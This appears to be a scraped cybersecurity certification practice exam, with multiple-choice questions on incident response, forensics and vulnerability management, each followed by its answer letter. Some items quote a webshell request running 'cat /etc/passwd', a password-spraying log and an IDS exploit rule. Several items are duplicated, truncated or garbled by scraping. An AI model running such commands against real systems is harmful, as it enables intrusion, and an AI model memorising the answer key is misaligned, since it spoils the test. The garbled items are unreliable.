Dion Training has just suffered a website defacement of its public-facing webserver. The CEO believes the company's biggest competitor may have done this act of vandalism. The decision has been made to contact law enforcement so that evidence can be collected properly for use in a potential court case. Laura is a digital forensics investigator assigned to collect the evidence. She creates a bit-by-bit disk image of the web server's hard drive as part of her evidence collection. What technology should Laura use after creating the disk image to verify the copy's data integrity matches that of the original web server's hard disk? A. AES B. 3DES C. SHA-256 D. RSA

C

Dion Training is concerned with the possibility of a data breach causing a financial loss to the company. After performing a risk analysis, the COO decides to purchase data breach insurance to protect the company from an incident. Which of the following best describes the company's risk response? A. Acceptance B. Mitigation C. Transference D. Avoidance

C

Dion Training is hiring a penetration testing firm to conduct an assessment of its corporate network. As part of the contract, the company has specified that it will not provide any network details to the penetration testing firm. Instead, the company wants to see how much information about the network can be found by the penetration testers using open-source research and scanning the corporate network. What type of assessment is this considered? A. Known environment testing B. Partially known environment testing C. Unknown environment testing D. Semi-trusted environment testing

C

During which incident response phase is the preservation of evidence performed? A. Post-incident activity B. Preparation C. Containment, eradication, and recovery D. Detection and analysis

C

During which phase of the incident response process does an organization assemble an incident response toolkit? A. Detection and analysis B. Post-incident activity C. Preparation D. Containment, eradication, and recovery

C

During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords? A. Birthday attack B. Brute force attack C. Cognitive password attack D. Rainbow table attack

C

During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident? A. Forensic review of the server required fallback to a less efficient service B. Raw financial information about the company was accessed C. PII of company employees and customers was exfiltrated D. IP addresses and other network-related configurations were exfiltrated

C

Fail to Pass Systems recently installed a break and inspect appliance that allows their cybersecurity analysts to observe HTTPS traffic entering and leaving their network. Consider the following output from a recorded session captured by the appliance: POST /www/default.php HTTP/1.1 HOST: <external IP address>.123 Content-Length: 147 Cache-Control: no-cache Origin: chrome-extension://ghwjhwrequsds User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux 1686; rv:24.0) Gecko/20100101 Firefox/24.0 Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryaym16ehT29760rUx Accept:*/* Accept-Language: zh, en-us; q=0.8, en; q=0.6 Cookie: security=low; PHPSESSID=jk3j2kdso8x73kdjhehakske ------WebKitFormBoundaryaym16ehT29q60rUx Content-Disposition: form-data; name="q" cat /etc/passwd ------WebKitFormBoundaryaym16ehT29760rUx Which of the following statements is true? A. This is a normal request from a host to your web server in the screened subnet B. The passwd file was just downloaded through a webshell by an attacker C. A request to issue the cat command for viewing the passwd occurred but additional analysis is required to verify if the file was downloaded D. The web browser used in the attack was Microsoft Edge

C

Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ? A. Low B. Medium C. High D. None

C

Mark works as a Department of Defense contracting officer and needs to ensure that any network devices he purchases for his organization's network are secure. He utilizes a process to verify the chain of custody for every chip and component used in the device's manufacturer. What program should Mark utilize? A. Chain of procurement B. Gray market procurement C. Trusted Foundry D. White market procurement

C

Oscar's manager has asked him to ensure that a compromised system has been completely purged of the compromise. What is Oscar's best course of action? A. Use an antivirus tool to remove any associated malware B. Use an antimalware tool to completely scan and clean the system C. Wipe and rebuild the system D. Restore a recent backup

C

Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically? A. Shut down the virtual machine off and make a forensic copy of its disk image B. Perform a live acquisition of the virtual machine's memory C. Suspend the machine and copy the contents of the directory it resides in D. Suspend the machine and make a forensic copy of the drive it resides on

C

Security researchers recently discovered a flaw in the Chakra JavaScript scripting engine in Microsoft's Edge browser that could allow remote execution or denial of service via a specifically crafted website. The CVSS 3.0 score for this vulnerability reads: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H What is the attack vector and the impact to integrity based on this rating? A. System, 9, 8 B. Browser, High C. Network, High D. None, High

C

Stephanie believes that her computer had been compromised because her computer suddenly slows down and often freezes up. Worried her computer was infected with malware, she immediately unplugged the network and power cables from her computer. Per the company procedures, she contacts the help desk, fills out the appropriate forms, and is sent to a cybersecurity analyst for further analysis. The analyst was not able to confirm or deny the presence of possible malware on her computer. Which of the following should have been performed during the incident response preparation phase to prevent this issue? A. Install additional network monitoring to conduct full packet capture of all network traffic B. Documenting the organization's incident response procedures C. Train users to not unplug their computers when a suspected incident is occurring D. The computer should have been scanned for vulnerabilities and patched

C

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the email's malicious link is not being blocked by the company's security suite when a user clicks the link. Susan asks you what action can be performed to prevent a user from reaching the website associated with the phishing email's malicious link. What action do you recommend she utilize? A. Block the IP address of the malicious domain in your firewall's ACL B. Forward this phishing email to all employees with a warning not to click on the embedded links C. Add the malicious domain name to your content filter and web proxy's block list D. Enable TLS on your organization's mail server

C

What document typically contains high-level statements of management intent? A. Guideline B. Standard C. Policy D. Procedure

C

What is the utilization of insights gained from threat research and threat modeling to proactively discover evidence of adversarial TTPs within a network or system called? A. Incident response B. Penetration testing C. Threat hunting D. Information assurance

C

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker? A. CNAME B. DNS registration C. Zone transfers D. DNSSEC

C

What tool is used to collect wireless packet data? A. Nessus B. John the Ripper C. Aircrack-ng D. Netcat

C

What type of information will a Cisco switch log be configured to capture logs at level 7? A. Emergencies B. Errors C. Debugging D. Warnings

C

When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture? A. -X B. -n C. -e D. -nn

C

When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture? A. -n B. -nn C. -e D. -X

C

Where should a forensic analyst search to find a list of the wireless networks that a laptop has previously connected to with a company-owned laptop? A. Search the wireless adapter cache for the list B. A list of the previously connected wireless networks is not stored on the laptop C. Search the registry for a complete list D. Search the user's profile directory for the list

C

Which analysis framework provides a graphical depiction of the attacker's approach relative to a kill chain? A. Lockheed Martin cyber kill chain B. MITRE ATT&CK framework C. Diamond Model of Intrusion Analysis D. OpenIOC

C

Which language would require the use of a decompiler during reverse engineering? A. Ruby B. JavaScript C. Objective-C D. Python

C

Which level of logging should you configure on a Cisco device to be notified whenever they shut down due to a failure? A. 2 B. 7 C. 0 D. 5

C

Which of the following agreements is used between companies and employees, between companies and contractors, and between two companies to protect information assets? A. SLA B. ISA C. NDA D. DSUA

C

Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database? A. Denial of service B. Cross-site scripting C. SQL injection D. Buffer overflow

C

Which of the following commands would NOT provide domain name information and details about a host? A. nslookup [ip address] B. dig -x [ip address] C. sc [ip address] D. host [ip address]

C

Which of the following information is traditionally found in the Scope of Work (SOW) for a penetration test? A. Timing of the scan B. Maintenance windows C. Excluded hosts D. Format of the executive summary report

C

Which of the following is NOT a host-related indicator of compromise? A. Processor consumption B. Memory consumption C. Beaconing D. Drive capacity consumption

C

Which of the following is NOT a part of the vulnerability management lifecycle? A. Detection B. Testing C. Investigating D. Remediation

C

Which of the following is NOT considered a component that belongs to the category of identity management infrastructure? A. Provisioning engine B. LDAP C. Human resource system D. Auditing system

C

Which of the following is NOT considered a phase in the incident response cycle? A. Detection and analysis B. Containment, eradication, and recovery C. Notification and communication D. Preparation

C

Which of the following is the biggest advantage of using Agile software development? A. Its inherent agility allows developers to maintain focus on the overall goals of the project B. Its structured and phase-oriented approach ensures that customer requirements are rigorously defined before development begins C. Reacts quickly to changing customer requirements since it allows all phases of software development to run in parallel D. It can produce better, more secure, and more efficient code

C

Which of the following is the difference between an incident summary report and a lessons-learned report? A. Both a lessons learned report and an incident summary report are designed for a technical audience B. A lessons-learned report is designed for a non-technical audience C. An incident summary report is designed for a non-technical audience D. Both a lessons learned report and an incident summer report are designed for a non-technical audience

C

Which of the following is the most important feature to consider when designing a system on a chip? A. Ability to be reconfigured after manufacture B. Type of real-time operating system in use C. Space and power savings D. Ability to interface with industrial control systems

C

Which of the following lists the UEFI boot phases in the proper order? A. Pre-EFI initialization, Security, Boot Device Select, Transient System Load, Driver Execution Environment, Runtime B. Driver Execution Environment, Boot Device Select, Security, Transient System Load, Pre-EFI initialization, Runtime C. Security, Pre-EFI initialization, Driver Execution Environment, Boot Device Select, Transient System Load, Runtime D. Boot Device Select, Security, Pre-EFI initialization, Driver Execution Environment, Transient System Load, Runtime

C

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext? A. SIEM event log monitoring B. Net flow capture C. Full packet capture D. Software design documentation review

C

Which of the following protocols is considered insecure and should never be used in your networks? A. SFTP B. HTTPS C. Telnet D. SSH

C

Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name? A. DMARC B. SMTP C. DKIM D. SPF

C

Which of the following security controls provides Windows system administrators with an efficient way to deploy system configuration settings across many devices? A. Anti-malware B. HIPS C. GPO D. Patch management

C

Which of the following sets of Linux permissions would have the least permissive to most permissive? A. 711, 717, 117 B. 544, 444, 545 C. 111, 734, 747 D. 777, 444, 111

C

Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. BGP looking glass usage C. Banner grabbing D. Registrar checks

C

Which of the following technologies is NOT a shared authentication protocol? A. Facebook Connect B. OAuth C. LDAP D. OpenID Connect

C

Which of the following tools is considered a web application scanner? A. OpenVAS B. Qualys C. ZAP D. Nessus

C

Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets? A. Mobile devices B. Employee workstations C. Cloud services D. On-premise servers

C

Which of the following types of encryption would ensure the best security of a website? A. SSLv1 B. SSLv3 C. TLS D. SSLv2 See all questionsBackSkip question

C

Which of the following would NOT be useful in defending against a zero-day threat? A. Threat intelligence B. Segmentation C. Patching D. Allow listing

C

Which of the following would be used to prevent a firmware downgrade? A. TPM B. HSM C. eFUSE D. SED

C

Which one of the following is an open-source forensic tool suite? A. FTK B. Helix C. SIFT D. EnCase

C

Which phase of the incident response process is most likely to include gathering additional evidence such as information that would support legal action? A. Preparation B. Detection and Analysis C. Containment, Eradication, and Recovery D. Post-incident Activity and Reporting

C

Which type of media sanitization would you classify degaussing as? A. Erasing B. Clearing C. Purging D. Destruction

C

Which type of system would classify traffic as malicious or benign based on explicitly defined examples of malicious and benign traffic? A. Deep learning B. Artificial intelligence C. Machine learning D. Generative adversarial network

C

Which type of threat will patches NOT effectively combat as a security control? A. Malware with defined indicators of compromise B. Known vulnerabilities C. Zero-day attacks D. Discovered software bugs

C

You are analyzing the logs of a forensic analysts workstation and see the following: root@DionTraining: /home# dd if=/dev/sdc of=/dev/sdb bs=1M count=1000 What does the bs=1M signify in the command list above? A. Removes error messages and other incorrect data B. Sets the beginning sector C. Sets the block size D. Sends output to a blank sector

C

You are conducting a grep search on a log file using the following REGEX expression: \b[A-Za-Z0-9_%+- ] +@[A-Za-20-9.-]+\. [A-Za-Z] {2,6}\b Which of the following strings would be included in the output of the search? A. [email protected] B. [email protected] C. [email protected] D. www.diontraining.com

C

You are conducting a static code analysis of a Java program. Consider the following code snippet: String custname = request.getParameter("customerName"); String query = "SELECT account_balance FROM user_data WHERE user_name PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery(); Based on the code above, what type of secure coding practice is being used? A. Input validation B. Session management C. Parameterized queries D. Authentication

C

You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and impacts the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why? A. Firewall logs B. NIDS C. Syslog D. Network mapping

C

You are conducting threat hunting for an online retailer. Upon analyzing their web server, you identified that a single HTML response returned as 45 MB in size, but an average response is normally only 275 KB. Which of the following categories of potential indicators of compromise would you classify this as? A. Beaconing B. Introduction of new accounts C. Data exfiltration D. Unauthorized privilege

C

You are interpreting a Nessus vulnerability scan report and identified a vulnerability in the system with a CVSS attack vector rating of A. Based on this information, which of the following statements would be true? A. Exploiting the vulnerability does not require any specialized conditions B. Exploiting the vulnerability requires the existence of specialized conditions C. The attacker must have physical or logical access to the affected system D. The attacker must have access to the local network that the system is connected to

C

You are notified by an external organization that an IP address associated with your company's email server has been sending spam emails requesting funds as part of a lottery collection scam. An investigation into the incident reveals the email account used was Connor from the sales department and that Connor's email account was only used from one workstation. You analyze Connor's workstation and discover several unknown processes running, but netflow analysis reveals no attempted lateral movement to other workstations on the network. Which containment strategy would be most effective to use in this scenario? A. Unplug the workstation's network cable and conduct a complete reimaging of the workstation B. Request disciplinary action for Connor for causing this incident C. Isolate the workstation computer by disabling the switch port and resetting Connor's username/password D. Isolate the network segment Connor is on and conduct a forensic review of all workstations in the sales department

C

You are reviewing a rule within your organization's IDS. You see the following output: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME NET any msg: "BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow: to client, established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/cacheSize\s*=\s*/"; byte test:10,>,0x3ffffffe,0, relative, string; max-detect-ips drop, service http; reference:cve, 2016-8077; classtype: attempted-user; sid:65535; rev:1; Based on this rule, which of the following malicious packets would this IDS alert on? A. Any malicious inbound packets B. Any malicious outbound packets C. A malicious inbound TCP packet D. A malicious outbound TCP packet

C

You are the incident response team lead investigating a possible data breach at your company with 5 other analysts. A journalist contacts you and inquires about a press release from your company that indicates a breach has occurred. You quickly deny everything and then call the company's public relations officer to ask if a press release had been published, which it has not. Which of the following has likely occurred? A. Disclosing based on regulatory requirements B. Communication was limited to trusted parties C. Inadvertent release of information D. Release of PII and SPI

C

You have tried to email yourself a file named "passwords.xlsx" from your corporate workstation to your Gmail account. Instead of receiving the file in your email, you received a description of why this was a policy violation and what you can do to get the file released or resent. Which of the following DLP remediation actions has occurred? A. Alert only B. Blocking C. Tombstone D. Quarantine

C

You just received a notification that your company's email servers have been blocklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails? A. The SMTP audit log from his company's email server B. Firewall logs showing the SMTP connections C. The full email header from one of the spam messages D. Network flows for the DMZ containing the email servers

C

Your company is adopting a cloud-first architecture model. Management wants to decommission the on-premises SIEM your analysts use and migrate it to the cloud. Which of the following is an issue with using this approach? A. A VM escape exploit could allow an attacker to gain access to the SIEM B. The company will have less control over the SIEM C. Legal and regulatory issues may prevent data migration to the cloud D. The company will be dependent on the cloud provider's backup capabilities

C

Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan? A. Only employees of the company B. Anyone C. Only an approved scanning vendor D. Any qualified individual

C

Your organization is updating its Acceptable User Policy (AUP) to implement a new password standard that requires a guest's wireless devices to be sponsored before receiving authentication. Which of the following should be added to the AUP to support this new requirement? A. Sponsored guest passwords must be at least 14 alphanumeric characters containing a mixture of uppercase, lowercase, and special characters B. Open authentication standards should be implemented on all wireless infrastructure C. All guests must provide valid identification when registering their wireless devices for use on the network D. Network authentication of all guest users should occur using the 802.1x protocol as authenticated by a RADIUS server

C

Yoyodyne Systems has recently bought out its competitor, Whamiedyne Systems, which went out of business due to a series of data breaches. As a cybersecurity analyst for Yoyodyne, you are assessing Whamiedyne's existing applications and infrastructure. During your analysis, you discover the following URL is used to access an application: https://www.whamiedyne.com/app/accountInfo?acct=12345 You change the URL to end with 12346 and notice that a different user's account information is displayed. Which of the following type of vulnerabilities or threats have you discovered? A. XML injection B. SQL injection C. Insecure direct object reference D. Race condition

C

Evaluate the following log entry: Jan 11 05:52:56 lxl kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:50:01:ca:55:00:15:50:01:ca:ad: 08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0 Based on this log entry, which of the following statements are true? (Select two) A. The packet was blocked outbound from the network B. MAC filtering is enabled on the firewall C. An attempted connection to the telnet service was prevented D. Packets are being blocked inbound to and outbound from the network E. The packet was blocked inbound to the network F. An attempted connection to the ssh service was prevented

CE

Which law requires government agencies and other organizations that operate systems on behalf of government agencies to comply with security standards? A. SOX B. HIPAA C. COPPA D. FISMA

D

Which software development life cycle model uses linear development concepts in an iterative, four-phase process? A. Waterfall B. Agile C. RAD D. Spiral

D

Which term is used in software development to refer to the method in which app and platform updates are committed to a production environment rapidly? A. Continuous monitoring B. Continuous integration C. Continuous delivery D. Continuous deployment

D

Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting? A. Machine learning B. Continuous integration C. Deep learning D. Data enrichment

D

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output: BEGIN LOG [ 4431 [https-get-form) host: diontraining.com [443] [https-get-form) host: diontraining.com [443] [https-get-form] host: diontraining.com [443] [https-get-form] host: diontraining.com [443] [https-get-form] host: diontraining.com [443] [https-get-form] host: diontraining.com [443] [https-get-form) host: diontraining.com [443] [https-get-form] host: diontraining.com login: admin login: admin login: root login: root login: dion login: dion login: jason login: jason password: P@$$word! password: CompT1@P@$$word, password: P@$$word! password: CompT1@P@$$word, password: P@$$word! password: CompT1@P@$$word, password: P@$$word! password: CompT1@P@$$word END LOG What type of attack was most likely being attempted by the attacker? A. Impersonation B. Credential stuffing C. Session hijacking D. Password spraying

D

After an employee complains that her computer is running abnormally slow, so you conduct an analysis of the NetFlow data from her workstation. Based on the NetFlow data, you identify a significant amount of traffic from her computer to an IP address in a foreign country over port 6667 (IRC). Which of the following is the most likely explanation for this? A. The computer has likely been compromised by an APT B. This is routine machine-to-machine communications in a corporate network C. The employee is using Internet Relay Chat to communicate with her friends and family overseas D. Malware has been installed on her computer and is using the IRC protocol to communicate

D

According to the Center for Internet Security's system design recommendation, which of the following control categories would contain information on the best security practices to implement within the SDLC? A. Controlled use of administrative privileges B. Malware defenses C. Inventory of authorized/unauthorized devices D. Application software security

D

After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor and will cost $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects? A. Waterfall Model B. DevOps C. Agile Model D. DevSecOps

D

Which type of monitoring would utilize a network tap? A. Router-based B. SNMP C. Active D. Passive

D

A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization's proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent? A. A malicious insider is trying to exfiltrate information to a remote network B. An attacker is performing reconnaissance of the organization's workstations C. Malware is running on a company workstation or server D. An infected workstation is attempting to reach a command and control server

D

An SNMP sweep is being conducted, but the sweep receives no-response replies from multiple addresses that are believed to belong to active hosts. What does this indicate to a cybersecurity analyst? A. The machines are not running SNMP servers B. The community string being used is invalid C. The machines are unreachable D. Any listed answers may be true

D

An analyst reviews the logs from the network and notices that there have been multiple attempts from the open wireless network to access the networked HVAC control system. The open wireless network must remain openly available so that visitors can access the internet. How can this type of attack be prevented from occurring in the future? A. Enable WPA2 security on the open wireless network B. Enable NAC on the open wireless network C. Install an IDS to protect the HVAC system D. Implement a VLAN to separate the HVAC control system from the open wireless network

D

An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system? A. Lateral movement B. Pivoting C. Golden ticket D. Pass the hash

D

An employee contacts the service desk because they cannot open an attachment they receive in their email. The service desk agent conducts a screen-sharing session with the user and investigates the issue. The agent notices that the attached file is named Invoice1043.pdf, and a black pop-up window appears and then disappears quickly when the attachment was double-clicked. Which of the following is most likely causing this issue? A. The file contains an embedded link to a malicious website B. The user doesn't have a PDF reader installed on their computer C. The email is a form of spam and should be deleted D. The attachment is using a double file extension to mask its identity

D

An organization wants to choose an authentication protocol that can be used over an insecure network without implementing additional encryption services. Which of the following protocols should they choose? A. TACACS+ B. PAP C. RADIUS D. Kerberos

D

As a cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results? A. The scanner was not compatible with the devices on your network B. The scanner failed to connect with the majority of workstations C. The network has an exceptionally strong security posture D. An uncredentialed scan of the network was performed

D

As a newly hired cybersecurity analyst, you are attempting to determine your organization's current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company's public-facing IP space? A. nmap B. Review network diagrams C. Google hacking D. shodan.io

D

Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? A. Peer review of source code B. DevSecOps C. Rigorous user acceptance testing D. Formal methods of verification

D

Dion Training Solutions has just installed a backup generator for their offices that use SCADA/ICS for remote monitoring of the system. The generator's control system has an embedded cellular modem that periodically connects to the generator's manufacturer to provide usage statistics. The modem is configured for outbound connections only, and the generator has no data connection with any of Dion Training's other networks. The manufacturer utilizes data minimization procedures and uses the data to recommend preventative maintenance service and ensure maximum uptime and reliability by identifying parts that need to be replaced. Which of the following cybersecurity risk is being assumed in this scenario? A. There is a critical risk being assumed since the cellular modem represents a threat to the enterprise network if an attacker exploits the generator and then pivots to the production environment B. There is a high risk being assumed since the presence of a cellular modem could allow an attacker to remotely disrupt the generator C. There is a medium risk being assumed since the manufacturer could use the data for purposes other than originally agreed upon D. There is a minimal risk being assumed since the cellular modem is configured for outbound connections only

D

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent? A. On-path attack B. Privilege escalation C. Spoofing D. Brute force attack

D

Dion Training utilizes a wired network throughout the building to provide network connectivity. Jason is concerned that a visitor might plug their laptop into a CAT 5e wall jack in the lobby and access the corporate network. What technology should be utilized to prevent users from gaining access to network resources if they can plug their laptops into the network? A. VPN B. UTM C. DMZ D. NAC

D

Dion Training's security team recently discovered a bug in their software's code. The development team released a software patch to remove the vulnerability caused by the bug. What type of test should a software tester perform on the application to ensure that it is still functioning properly after the patch is installed? A. Fuzzing B. Penetration testing C. User acceptance testing D. Regression testing

D

During a forensic investigation, Maria is told to look for information in slack space on the drive. Where should she look, and what is she likely to find? A. She should look at unallocated space, and she is likely to find file fragments from deleted files. B. She should look at unused space where files were deleted, and she is likely to find complete files hidden there by the individual being investigated. C. She should look in the space reserved on the drive for spare blocks, and she is likely to find complete files duplicated there. D. She should look at unused space left when a file is written, and she is likely to find file fragments from deleted files.

D

During a port scan, you discover a service running on a registered port. Based on this, what do you know about this service? A. The vulnerability status of the service on the registered port B. The service's name on the registered port C. The service is running on a port between 0-1023 D. The service is running on a port between 1024 and 49151

D

During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? A. SMS is a costly method of providing a second factor of authentication B. SMS should be encrypted to be secure C. SMS should be paired with a third factor D. SMS messages may be accessible to attackers via VoIP or other systems

D

Fail to Pass Systems has recently moved its corporate offices from France to Westeros, a country with no meaningful privacy regulations. The marketing department believes that this move will allow the company to resell all of its customer's data to third-party companies and shield the company from any legal responsibility. Which policy is violated by this scenario? A. Data enrichment B. Data minimization C. Data limitation D. Data sovereignty

D

Following a root cause analysis of an edge router's unexpected failure, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue? A. Increase network vulnerability scan frequency B. Verify that all routers are patched to the latest release C. Ensure all anti-virus signatures are up to date D. Conduct secure supply chain management training

D

Following an incident, the incident response team has generated many recommendations for additional controls and items to be purchased to prevent future recurrences. Which of the following approaches best describes what the organization should do next? A. Conduct a cost/benefit analysis of each recommendation against the company's current fiscal posture B. Contract an outside security consultant to provide an independent assessment of the network and outsource the remediation efforts C. Immediately procure and install all of them because the adversary may reattack at any time D. Submit a prioritized list with all of the recommendations for review, procurement, and installation

D

If an attacker can compromise an Active Directory domain by utilizing an attack to grant administrative access to the domain controllers for all domain members, which type of attack is being used? A. Pass the hash B. Lateral movement C. Pivoting D. Golden ticket

D

In which phase of the security intelligence cycle do system administrators capture data to identify anomalies of interest? A. Analysis B. Dissemination C. Feedback D. Collection

D

Jamal is concerned with complying with the U.S. federal law covering student educational records. Which of the following laws is he attempting to comply with? A. HIPAA B. GLBA C. SOX D. FERPA

D

Jeff has been contacted by an external security company and told that they had found a copy of his company's proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately? A. Delete the repository B. Revaluate the organization's information management policies C. Investigate if the source code was downloaded D. Change the repository from public to private

D

Joseph is interpreting a vulnerability that has a CVSS (v3.1) base score of 8.3. In what risk category would this vulnerability fit? A. Low B. Medium C. Critical D. High

D

Marta's organization is concerned with the vulnerability of a user's account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Password complexity B. Password history C. Minimum password length D. Password expiration

D

Matt is creating a scoping worksheet for an upcoming penetration test for his organization. Which of the following techniques is NOT usually included in a penetration test? A. Social engineering B. Physical penetration attempts C. Reverse engineering D. Denial-of-service attacks

D

Michelle has just finished installing a new database application on her server. She then proceeds to uninstall the sample configuration files, properly configure the application settings, and update the software to the latest version according to her company's policy. What best describes the actions Michelle just took? A. Vulnerability scanning B. Input validation C. Patch management D. Application hardening

D

Natalie wants to create a backup of the permissions before making changes to the Linux workstation she will remediate. What Linux tool can she use to back up the permissions of the system's complete directory structure? A. iptables B. aclman C. chbkup D. getfacl

D

Review the following packet captured at your NIDS: 23:12:23.154234 IP 86.18.10.3:54326 > 71.168.10.45:3389 Flags [P.], Seq 1834:1245, ackl, win 511, options [nop, nop, TS val 263451334 erc 482862734, length 125 After reviewing the packet above, you discovered there is an unauthorized service running on the host. Which of the following ACL entries should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on this host? A. DENY IP HOST 71.168.10.45 ANY EQ 25 B. DENY IP HOST 86.18.10.3 EQ 3389 C. DENY TCP ANY HOST 86.18.10.3 EQ 25 D. DENY TCP ANY HOST 71.168.10.45 EQ 3389

D

Shawn needs to boot a system to remediate it. The system was compromised by an attack and had a malicious program installed by creating a RunOnce key in the registry. What can Shawn do to boot the computer and prevent the RunOnce from executing the malicious program listed in the registry key? A. RunOnce cannot be disabled therefore she will need to boot from external media to disable it first B. Boot with the -RunOnce flag C. Disable the registry at boot D. Boot with Safe Mode

D

Taylor needs to sanitize hard drives from some leased workstations before returning them to a supplier at the end of the lease period. The workstations' hard drives contained sensitive corporate data. Which is the most appropriate choice to ensure that data exposure doesn't occur during this process? A. Clear, validate, and document the sanitization of the drives B. Clear the drives C. The drives must be destroyed to ensure no data loss D. Purge, validate, and document the sanitization of the drives

D

The incident response team leader has asked you to perform a forensic examination on a workstation suspected of being infected with malware. You remember from your training that you must collect digital evidence in the proper order to protect it from being changed during your evidence collection efforts. Which of the following describes the correct sequence to collect the data from the workstation? A. RAM, CPU cache, Swap, Hard drive B. Hard drive, Swap, CPU cache, RAM C. Swap, RAML, CPU cache, Hard drive D. CPU cache, RAM, Swap, Hard drive

D

The management at Steven's work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network? A. A discovery scan using a port scanner B. A physical survey C. Reviewing a central administration tool like an endpoint manager D. Router and switch-based MAC address reporting

D

Tim is working to prevent any remote login attacks to the root account of a Linux system. What method would be the best option to stop attacks like this while still allowing normal users to connect using ssh? A. Add root to the sudoers group B. Add a network IPS rule to block root logins C. Add an iptables rule blocking root logins D. Change sshd_config to deny root login

D

Trevor is responsible for conducting vulnerability scans for his organization. His supervisor must produce a monthly report for the CIO that includes the number of open vulnerabilities. What process should Trevor use to ensure the supervisor gets the information needed for their monthly report? A. Create an account for the supervisor to the vulnerability scanner so they can run the reports themselves B. Run a report each month and then email it to his supervisor C. Create an account for the supervisor's assistant so they can create the reports D. Create a custom report that is automatically emailed each month to the supervisor with the needed information

D

What cybersecurity objective could be achieved by running your organization's web servers in redundant, geographically separate datacenters? A. Confidentiality B. Integrity C. Immutability D. Availability

D

What is a reverse proxy commonly used for? A. To prevent the unauthorized use of cloud services from the local network B. Allowing access to a virtual private cloud C. To obfuscate the origin of a user within a network D. Directing traffic to internal services if the contents of the traffic comply with the policy

D

What popular open-source port scanning tool is commonly used for host discovery and service identification? A. Nessus B. services.msc C. dd D. nmap

D

What role does the red team perform during a tabletop exercise (TTX)? A. System administrator B. Network defender C. Cybersecurity analyst D. Adversary

D

What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately? A. Organizational governance B. Processor utilization C. Log disposition D. Virtual hosts

D

What technique is an attacker using if they review data and publicly available information to gather intelligence about the target organization without scanning or other technical information-gathering activities? A. Active scanning B. Patch management C. Vulnerability scanning D. Passive reconnaissance

D

What technology is NOT PKI x.509 compliant and cannot be used in various secure functions? A. SSL/TLS B. PKCS C. AES D. Blowfish

D

What tool can be used as an exploitation framework during your penetration tests? A. Nessus B. Nmap C. Autopsy D. Metasploit

D

What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? A. Ransomware B. Trojan C. Logic bomb D. Polymorphic virus

D

